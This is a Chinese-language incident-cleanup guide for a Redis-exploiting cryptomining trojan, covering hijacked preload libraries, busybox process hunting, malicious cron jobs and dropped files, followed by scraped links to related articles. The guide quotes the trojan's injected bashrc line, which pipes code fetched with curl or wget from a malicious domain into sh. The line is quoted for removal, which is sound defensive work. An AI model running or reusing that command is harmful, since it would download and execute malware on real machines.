参考:

https://www.cnblogs.com/kobexffx/p/11000337.html

利用redis漏洞获得root权限,挖矿. 解决方法: 用普通帐号启redis,用云的redis

清理步骤
背景描述:
在清除过程中,由于系统动态链接被劫持导致无法正常操作木马进程文件,需要把下面的动态链接库文(libEGLD.so\ ld.so.preload)件移到其他地方或删除掉。

一、移除木马生成的动态链接库,由于被修改了动态链接库,系统的命令ps显示的进程并不完全,隐藏掉了木马进程。
mv /usr/local/lib/libEGLD.so /root/
mv /etc/ld.so.preload /root/

二、kill掉木马进程,木马进程名称:
1.下载busybox (https://busybox.net/downloads/binaries/1.20.0/busybox-x86_64)
因为系统动态链接库被劫持,导致系统命令不会显示出对应木马进程。该工具集成了linux常用命令且全为静态编译,不受劫持干扰。

2.利用busybox执行top 查找占用cpu高的异常进程
实例:
./busybox top

3. 找到对应进程后kill掉。
实例:
../busybox kill -9 pid
或者 ./busybox pkill 异常进程名称
三、清除掉crontab的木马定时任务:
1. /var/spool/cron/目录下所有包含 lsd.systemten.org域名的记录的文件
2. /etc/cron.d/root目录下所有包含 lsd.systemten.org域名的记录的文件

四,删除木马释放的文件:
/usr/local/bin/writeable
/usr/libexec/writeable
/usr/bin/writeable
/etc/rc0.d/K01sshservice
/etc/rc1.d/K01sshservice
/var/spool/cron/crontabs/root
/etc/rc2.d/S01sshservice
/etc/rc3.d/S01sshservice
/etc/rc4.d/S01sshservice
/etc/rc5.d/S01sshservice
/etc/rc6.d/K01sshservice
/tmp/ccEIF3Ld.s
/tmp/ccstOJoH.o
/tmp/cc1iGERd.res
/tmp/ccgwA0Gd.c
/var/spool/cron/crontabs/tmp.XUYfjh
/tmp/.XImunix
/usr/local/sbin/sshd
/usr/lib/systemd/system/sshservice.service
/usr/local/lib/libEGLD.c
/var/spool/cron/crontabs/tmp.WtljMO
/var/spool/cron/crontabs/tmp.olDaF7

五、恢复木马修改过的文件
1.恢复被木马修改过的域名指向
/etc/hosts
2.删除被木马添加的内容
/etc/bashrc
内容: curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

redis漏洞攻击的更多相关文章

  1. redis 漏洞造成服务器被入侵-CPU飙升

    前言   前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死.然后又试了几次,都是一样的结果,10s时间,进程被杀死.这个时候我还 ...

  2. PHP通用的XSS攻击过滤函数,Discuz系统中 防止XSS漏洞攻击,过滤HTML危险标签属性的PHP函数

    XSS攻击在最近很是流行,往往在某段代码里一不小心就会被人放上XSS攻击的代码,看到国外有人写上了函数,咱也偷偷懒,悄悄的贴上来... 原文如下: The goal of this function ...

  3. [web安全]Web应用漏洞攻击分析与防范

    网站攻击主要分为以下几类: (1) sql注入攻击 SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.它是利 ...

  4. 利用“参数赋值”防范SQL注入漏洞攻击

    <<年轻,无权享受>————送给每一个看到此文的同僚们 在这无精打采的炎夏 我躺在阳台上房东的旧沙发 回想几个月来遇到的问题 我不禁内心开始慌张喘着粗气 还有大把时间去打拼 没有到只 ...

  5. CentOS6.x服务器OpenSSH平滑7.3p版本——拒绝服务器漏洞攻击

    对于新安装的Linux服务器,默认OpenSSH及OpenSSL都不是最新的,需要进行升级以拒绝服务器漏洞攻击.本次介绍的是升级生产环境下CentOS6.x系列服务器平滑升级OpenSSL及OpenS ...

  6. 解决反射型XSS漏洞攻击

    对于程序员来说安全防御,无非从两个方面考虑,要么前端要么后台. 一.首先从前端考虑过滤一些非法字符. 前端的主控js中,在<textarea> 输入框标签中,找到点击发送按钮后,追加到聊天 ...

  7. 利用foo函数的Bof漏洞攻击:构造攻击字符串

    利用foo函数的Bof漏洞攻击:构造攻击字符串 一.基础知识储备 objdump反汇编指令.gdb函数调试运行.Perl语言.|管道符 二.实验步骤 1. 通过反汇编了解程序功能及代码 ①反汇编查看文 ...

  8. 浅谈XXE漏洞攻击与防御——本质上就是注入,盗取数据用

    浅谈XXE漏洞攻击与防御 from:https://thief.one/2017/06/20/1/ XML基础 在介绍xxe漏洞前,先学习温顾一下XML的基础知识.XML被设计为传输和存储数据,其焦点 ...

  9. asp.net core mvc 统一过滤参数,防止注入漏洞攻击

    参考链接: http://www.lanhusoft.com/Article/132.html 在core下,多少有些改动,其中js部分被注释掉了,如下: public static string F ...

随机推荐

  1. Python前端HTML

    一.web标准介绍 web标准: w3c:万维网联盟组织,用来制定web标准的机构(组织) web标准:制作网页遵循的规范 web标准规范的分类:结构标准.表现标准.行为标准. 结构:html.表示: ...

  2. UVA 10491 Cows and Cars (全概率公式)

    #include<bits/stdc++.h> #include<stdio.h> #include<iostream> #include<cmath> ...

  3. Pollard Rho 算法简介

    \(\text{update 2019.8.18}\) 由于本人将大部分精力花在了cnblogs上,而不是洛谷博客,评论区提出的一些问题直到今天才解决. 下面给出的Pollard Rho函数已给出散点 ...

  4. source和resource的区别

    idea中,有时新导入的工程会出现 类的标识为红色的J,此时为无效,并且该类不能被编译,这是因为该类所在的文件夹java没有被标记为Sources Root,而放置配置文件的resources文件夹没 ...

  5. js模拟24小时的倒计时效果

    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...

  6. [CSP-S模拟测试]:停不下来的团长奥尔加(DP)

    题目传送门(内部题125) 输入格式 第一行一个整数$n$,含义同题中所述. 第二行$n$个整数,第$i$个数表示$p_i$,含义同题中所述. 输出格式 一行一个整数,表示答案对$1000000007 ...

  7. eclipse内存溢出 参数配置

    http://blog.csdn.net/liuhenghui5201/article/details/50783444

  8. Error running 'Tomcat 9.0.241': port out of range:-1

    这种情况很容易解决,别急. 修改默认配置,tomcat的server.xml检查一下,端口不能是-1, 一般会选80,或者1-65535之间的任意一个整数 路径:C:\Program Files\Ap ...

  9. LeetCode 14. 最长公共前缀(Longest Common Prefix)

    题目描述 编写一个函数来查找字符串数组中的最长公共前缀. 如果不存在公共前缀,返回空字符串 "". 示例 1: 输入: ["flower","flow ...

  10. 一、基础篇--1.1Java基础-Object类中常见的方法,为什么wait notify会放在Object里边

    这是个设计相关的问题,它考察的是面试者对现有系统和一些普遍存在但看起来不合理的事物的看法.回答这些问题的时候,你要说明为什么把这些方法放在Object类里是有意义的,还有不把它放在Thread类里的原 ...